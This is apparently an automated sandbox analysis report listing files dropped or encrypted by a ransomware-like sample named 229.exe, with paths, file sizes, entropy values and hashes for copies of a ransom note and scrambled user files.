SHA-512:	A2884ED70350C6842BAEB9F72FE1A554BBD15681F1F5DAA09D5477FAB42BDD7C7A2AE08207B5E7278A5DB1244E6E51C20503FD8C42F42F89AA6FA9D82E750896
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\moz-safe-about+home\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.files\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	74268
Entropy (8bit):	7.997474892070555
Encrypted:	true
MD5:	B5148A825E9EB4C4520ACC3995C41D02
SHA1:	778B8A189D72DBF86279A46490A8B0C91A61D6D2
SHA-256:	EABB9A941701079C83B119D38FDE86E5D6E7B4F256E136C63C583B2616ED2408
SHA-512:	A69F09F06C50E96AA9CC5121D999D740BBFC3208904EBC078063219676EAF1D07100F931E41C080450FAC11195D5A5358C67659CE8E25CB023CE085C60AEB4DA
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\moz-safe-about+home\idb\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\times.json Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	569
Entropy (8bit):	7.617504328071149
Encrypted:	false
MD5:	3FDE0DD3998F3C0582F2B46092D1E62B
SHA1:	023F6036F97B140B68B1CE164AF2339E25D6AAA2
SHA-256:	62FEB20095D3D11204144904CD13A0716589826A97435CBA0C34A54CF8CAF4C2
SHA-512:	0E2918C5339D59FFAF5097DD63E38A217885D6B747E01871C8044FFD3492A70CB83A985DB09501FD7050F744EEA2109F971AC281AC9D946C145A99B8E90A9F84
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\webapps\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\webapps\webapps.json Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	542
Entropy (8bit):	7.505592559976481
Encrypted:	false
MD5:	335B77FB1E4600E64FAD10443502ED61
SHA1:	29A388E98DF45C8EBAF24FC38F16BDACAE6AA4D8
SHA-256:	29CEC4F1AE164214CD7BF1CEDBCF9DE497A408F291BEC09E0C8E055A7F75468C
SHA-512:	1B51080D54635D094E53C7B6E494DABD27A6E4EA0A57B16765085A20BDB9624E6D837238DDF639A491C6A2267539498E524D93EB2B9EB83907384BB3A6950F7F
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\webappsstore.sqlite Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	98844
Entropy (8bit):	7.998284378172848
Encrypted:	true
MD5:	3F272AB7D11A37448D8ADF60CB90A32B
SHA1:	247601CF690885011D5428397390BDBAE4A5C83E
SHA-256:	C3ABAA79350140F8544F483B5ECE38E6F2EDE582C022DDE20797CA46789C5924
SHA-512:	AF5626D4EE88640378041760B26485B0815A02C52218210A0DA1C16C6418473E589485EFDB33E22D63605BFCA6A6B453E8D970FB4DD6B7EB557D462DC88F90D6
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\xulstore.json Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	890
Entropy (8bit):	7.770836948374763
Encrypted:	false
MD5:	35C0301C10540F97A927DB79912D5D3F
SHA1:	C25035D6B35EF3BDC60615C72F5979C682506047
SHA-256:	6AF3D923F4457B98ECCE25774D12EC4EEED841F5F9DA8D71D92B1F6CC1C28AF1
SHA-512:	A7F18BD05643291BC3358D4A415B73C1072020F5F33D5B011ACB9128DAFD31981E00853245953E2B84DA52AE88AFD7C0023A2AAA4664C715770BFD188BBE30DE
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	662
Entropy (8bit):	7.639329217560706
Encrypted:	false
MD5:	7BB726FB2F0960A7DBFA4B9C12B8F14D
SHA1:	7AFED8DF5DD240B0BD139C92CABA4A01F5DE7336
SHA-256:	FFE98585A7A927317D5F1AFB819295235A6D8760B8E5C5A42546321D12BF4568
SHA-512:	0C1AD41A84FF04332D4A54F38B88D5238F45496983B1E8113E3D0D25D08128C1F8322B6AA8308273ECFC125E40CE1166F63066999D7E9F9FCA4C8B2CB91A5F56
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Sun\Java\Deployment\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Sun\Java\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Sun\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\Contacts\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\Contacts\user.contact Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	45141
Entropy (8bit):	7.9958890600818116
Encrypted:	true
MD5:	8B3B4EE550D13E124EEFD6BB322308E1
SHA1:	7EDE92EE1EEFC4E26F25D8C6691D603A205FFF70
SHA-256:	610292B9067FB838E9509ED2E8F51A9B19A4E7AF5CF3822167FFEE9311EBA44F
SHA-512:	242F0CEB43A68D737F6242B21E212A97CBD2176981FEDF1FF777207137C1BB753E29504B6931A0BCA6612B77F80E1606165B83D929985D60E69E5264C162C62F
Malicious:	false

C:\Users\user\Desktop\BJZFPPWAPT\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\Desktop\BNAGMGSPLO.png Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1566
Entropy (8bit):	7.876439243805058
Encrypted:	false
MD5:	DA649C5C40F2FF1ADD1BA05AF5BD43B4
SHA1:	074D765EFD565C4FA45717DB884D75CE1541B03A
SHA-256:	CFF41E76598ADD80C63AA5B08ADC2862F8E5D912CB015AB2DB9222B81D01BAD5
SHA-512:	7FE54745F501B207ED6F38F125E408075D81F4746AC03DE6C23EB4FC186A69DD0484B2FF388735C3874902121B6D27A4CCD8CBAA2F0228DA21CFBBA8EBC199EE
Malicious:	false

C:\Users\user\Desktop\BNAGMGSPLO\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\Desktop\EOWRVPQCCS.mp3 Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1566
Entropy (8bit):	7.856776581379653
Encrypted:	false
MD5:	99885492EBB3C546DD4AB024E98620EC
SHA1:	BA2326081818509BC98D1828D83E2064F613DFAD
SHA-256:	51688556308C6731F227977252FC1494E5E3CE4459E51BBFD8415BBC706FFF0A
SHA-512:	0610E7CE47AEB726EC398A8DBBC05DA1428ABF7E464BE0470C7F10E7B52729B7D9A88DC7B6CB52BAAA7BE326FFC2DC18167CAFE6C6C8674E32AB2FB06CF85BE2
Malicious:	false

C:\Users\user\Desktop\EOWRVPQCCS\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\Desktop\GAOBCVIQIJ.pdf Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1566
Entropy (8bit):	7.872999314949437
Encrypted:	false
MD5:	776138BFAF04C23C2C360DA6133F2839
SHA1:	5FC268A581500AD4CA67320F2E6DEEAF7D8D3211
SHA-256:	8715764DDD7102CDAC37C85866F005EB9949E7ED84D4003654A5FFAAA199227D
SHA-512:	8FC770F6A08F52D0A933DFB89907CFC878B98ED79384156DD10FCE18E87AB02BFC20FFA211DCBD0BE8647970F38E1E36B3C3E913D1D8860DC46A5FDC9A163BD8
Malicious:	false

C:\Users\user\Desktop\GAOBCVIQIJ.png Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1566
Entropy (8bit):	7.864119169770732
Encrypted:	false
MD5:	F0D7E4F817D030BF5642C4BD01CD6639
SHA1:	DA6944ECD6997063647B0D93F1B81C434A1F5860
SHA-256:	BCC935A755E06E702AA3506211CFA545D7B765E29BD42B701B933701DCA1B666
SHA-512:	6B8570447F87AC055E8C162C15F440258259065DA26156D1C009C51B5DF56F3DB198B67CA14CD54F990B21CD80EC2E7658FAB5E124C57A4B87A26B72E97AA147
Malicious:	false

C:\Users\user\Desktop\GIGIYTFFYT\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\Desktop\GRXZDKKVDB.png Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1566
Entropy (8bit):	7.877683429251799
Encrypted:	false
MD5:	5B6A4CBD378D78759A7760698DECE4C9
SHA1:	E52126996A0D41EE84ECC06CAA0E6BFCBD95FB5C
SHA-256:	B16FF36D5276F4D381D2DB9E67978D2ED54073CEA6A80903AB77B88324513915
SHA-512:	4224B73E3564D60710050CE2CD36D1FD2CA59A63DEAF42F8B677B4CE44A531867B762FBE12718F8ED0F584A2B3743B1A260625CB0A8D6D4D24AC6D3F94AF124C
Malicious:	false

C:\Users\user\Desktop\IPKGELNTQY.mp3 Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1566
Entropy (8bit):	7.858689465616047
Encrypted:	false
MD5:	FE2C2D6C203BBBF2C8F1A6D91E9AC75E
SHA1:	AC3F52644E38A4CA99DC0622178F0A1EB44735ED
SHA-256:	0416F9DADCEC5FC66AB6D028927F0363598ECB44CF5074FC99B974E42BE63C54
SHA-512:	E3E4C4C5AE11B020B89B219A63AAE26602993D321A7998C7332801E300F9B695CF1D1E3FFCA7740A93337B96AD298FF191070B13A65CB8A8CC9854BECA736F6E
Malicious:	false

C:\Users\user\Desktop\IPKGELNTQY.pdf Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1566
Entropy (8bit):	7.871146479480056
Encrypted:	false
MD5:	A1A512D5D627F5122D37D9C1FF794AF2
SHA1:	D1CAB9CE502AA3BF4665AF37093AEE603BD7A5A3
SHA-256:	A4E4E16AC12517B365C5E929E9EF3753D5F9A52FE0B1478293F3DF02F540D2C9
SHA-512:	10D657FC88F0D1F6821C184288482D7532CE49EA5FBC225F49882C4F23B8019DA12B3E1EC2AB0E245CBC95D85F5C17262AF557D4CE79D579351B21B03B00D2BF
Malicious:	false

C:\Users\user\Desktop\LSBIHQFDVT.jpg Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1566
Entropy (8bit):	7.877437520590676
Encrypted:	false
MD5:	50656DFD7D0A3089392151D990F41941
SHA1:	82E60B7300085E619DF69D20A084CAEDA4C61062
SHA-256:	E236C1AB6D27947F6B9E694727B24C3C1539746331959E7A38AE7092F9DAAB46
SHA-512:	A2C4F242790420735334BDE5FE09FDA57213446EBE02AE14DAAE4680A98FA572CA578A0F88E5FEFEA0234F1BE184E6763EA54BD4B08CB691B4EB2073EB5D18C4
Malicious:	false

C:\Users\user\Desktop\LSBIHQFDVT\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\Desktop\MXPXCVPDVN.docx Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1566
Entropy (8bit):	7.866060362464317
Encrypted:	false
MD5:	2031557E534076A72A812A005CD21D79
SHA1:	0A852536130120AE714AE1B16FDEE5CA5380B373
SHA-256:	108C5E368EF50BA3E2EE3BF920AFB996FDFDCCF3456712CAEEE852B27A5CA89B
SHA-512:	07DAC7F70658C0FE2B62E6B1352CB151925920BECD3C239F4BADF92B58AD4BFBE952CF6EF1DBCC48067FF7E51DE6FFF60C799328355500A7B027F4AF5DE33871
Malicious:	false

C:\Users\user\Desktop\MXPXCVPDVN.jpg Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1566
Entropy (8bit):	7.853586662445556
Encrypted:	false
MD5:	503764763378CF1DC970121EEDC86FBA
SHA1:	AC36BBD5DDD9867EC4940E3D33204B227A52CFB2
SHA-256:	38B51F6E624315DA0845335E1D77A4F4713621108FB56A62E3A45AB58E1EBEF8
SHA-512:	BE22C0B505159FDA32652F5DF47A2E23211B2BDFA5DB56FAAB35DE63EA355550F6D02FB2E39E0D537C663A8B165C3FED09E04663A309A4B91F93FB9EA125AAB1
Malicious:	false

C:\Users\user\Desktop\MXPXCVPDVN.xlsx Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1566
Entropy (8bit):	7.867099390407132
Encrypted:	false
MD5:	42ED3DEA7D4C0AEE7E1DC22DDC511956
SHA1:	E6A14A15AE0AABA3FE9466574406D6BF5043ED57
SHA-256:	08665F5667471866E135BE6BAFDB91AD114B1CBE542EF76040E0C8B305FC34A5
SHA-512:	1E3B617624EC9C7F1D119216B0E8F200BD197AF6C02E1144F87F1FC5FD7E55622BF59CA1DA4F3B5CBDC40A1D26C14033748858F2312D0D9D2C6F2038A2EB1909
Malicious:	true

C:\Users\user\Desktop\MXPXCVPDVN\BNAGMGSPLO.png Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1566
Entropy (8bit):	7.872899119111563
Encrypted:	false
MD5:	E0810D5EFFE1986A3DB772E1F13B95C5
SHA1:	11E6F07F4194E1B314AC1255C83BC6E8213FC548
SHA-256:	BFADD8702DA8639FCD8C75FEA33CBD6D53A3D5A8F2B1055984651469409DEB7A
SHA-512:	18C08719B57BACCC304D617208D6336358864387AE07BED408BB8FD3953C50D2495C7C2FBE96584EB0484C9A9F519B02C01002E5B5025C2A9485C495C5283F7F
Malicious:	false

C:\Users\user\Desktop\MXPXCVPDVN\GAOBCVIQIJ.pdf Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1566
Entropy (8bit):	7.856024915711144
Encrypted:	false
MD5:	30E7E1E6FA1B9DBABE2215961078398A
SHA1:	8EC2328AAFC39E52F08C8DA6356BA82D62D73B6F
SHA-256:	50ABD768A2A17DD3964574ACBECA436492254CA4EE4DF3666EBC6826C8DE6F9B
SHA-512:	A9B00FE9B49B4C5232BF6F18536FEF1BD2765C4FCBC63ED7B2D0A4956348AA433D2203C28525840336CD71924DB392A9D1ED7B6C969433884147270D52DFA32E
Malicious:	false

C:\Users\user\Desktop\MXPXCVPDVN\MXPXCVPDVN.docx Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1566
Entropy (8bit):	7.851621066408997
Encrypted:	false
MD5:	64C1C06CF1259F46935196481189BD89
SHA1:	68C38073EEE6B6238BEED0FF75625CFB5DAC76E8
SHA-256:	388EDD69448FE0DD6A3C6C142697BEB85F737ABE77B89ACE461515AB53B35DA0
SHA-512:	A0B6FC8967AADBFBD36CC25B9CDFDE408AA15B4D8A2C32671634B8F2B79AFB7631FF97AEF9648CEBE56BBA0C4931149AB85EFE81A41E51D1F561A4A329189D4D
Malicious:	true

C:\Users\user\Desktop\MXPXCVPDVN\NEBFQQYWPS.xlsx Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1566
Entropy (8bit):	7.86466040613858
Encrypted:	false
MD5:	A0574C2CB3FC88BD3DCE639779FDAECD
SHA1:	C8709316279222B4C9AC6F16579D343D1975D0C1
SHA-256:	0C11E7932A1FE2740B603BC10858E9DA87A9703A731A04F98FE3A361BA19A11F
SHA-512:	947543D9519D15A5A4390B124BFB1A78936A38C5B694164F497A16E204D46A74711642FCECAFA1226BDB994FD453A8785C8B7A235BB574AF115D09C8A1FC6B2A
Malicious:	true

C:\Users\user\Desktop\MXPXCVPDVN\NVWZAPQSQL.mp3 Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1566
Entropy (8bit):	7.874113011636081
Encrypted:	false
MD5:	A415BFF4516EA1DFEA95E6F6999C8D20
SHA1:	5FD2D2B7FA19F3E504CC402600BF897648D0D8C4
SHA-256:	8A81F453AAE5B80E8442E034BF117531580324EAECD54262702DCAF1C5CB5817
SHA-512:	4E743EBED91BCBBA4AFA69BCF73251B242AA3FBA8B88EB63D36EB1D511D9F708E9FE08114782C8D797FC05306953BD6D2677A6A2F91AC852ADD06B2730DC5547
Malicious:	false

C:\Users\user\Desktop\MXPXCVPDVN\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\Desktop\MXPXCVPDVN\PWCCAWLGRE.jpg Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1566
Entropy (8bit):	7.8642149083799335
Encrypted:	false
MD5:	E349CBB2DC6F6551CAA7A77827E4BC82
SHA1:	49E09D813A4C9666FCE41AA7686E849E83565D43
SHA-256:	6B0C3EB4B517E25E67EE53ACB4F6B3FEE40C6EDB0F37ED57B4B9CF6188D0E39D
SHA-512:	4E8BABDDE4F0D5394DC57AD1C0EDFE975B39FF7C9D02C960E053E5A80D25512C4F8DF77CFD3DE03424E39F2007AFA072055C78D12081969ABFC83720524A7403
Malicious:	false

C:\Users\user\Desktop\NEBFQQYWPS.xlsx Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1566
Entropy (8bit):	7.854100926023221
Encrypted:	false
MD5:	956F71527C19112EAC047FC413B166DC
SHA1:	E45846138395DB4C876EB27DCECFF0C717325882
SHA-256:	AE8A2F0AF9AC3FB9B2A5BB0D98805D59C1704BA06E2A2FA2184E85DB356C89CF
SHA-512:	CEF94A7B14561FA06391896A9C61C6ADB1B3E5D2A2B6E9EE9775CA20B75338CF7208B20D7C95134CEE734AD5FC76FE905BC9D82326B7AE5B7C345BD582FA68D1
Malicious:	true

C:\Users\user\Desktop\NEBFQQYWPS\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\Desktop\NVWZAPQSQL.mp3 Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1566
Entropy (8bit):	7.884443529111168
Encrypted:	false
MD5:	0AA033069F0133050362D374CE0B7D12
SHA1:	CD8289ABFD773C70765F2B7BD148251406AB0D42
SHA-256:	EF7B525D3B77D8679B0B9C43772CA0A98B6E7E9378DE7D28D7B77E5AD7E99F2E
SHA-512:	DFAEADAD996C98F23767692513768F12402A4DBAE4DE6377216C6A95C481758513E041D652D9446B79D834C76B3797196977198CE4BBC150BA498AB31E9D3561
Malicious:	false

C:\Users\user\Desktop\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
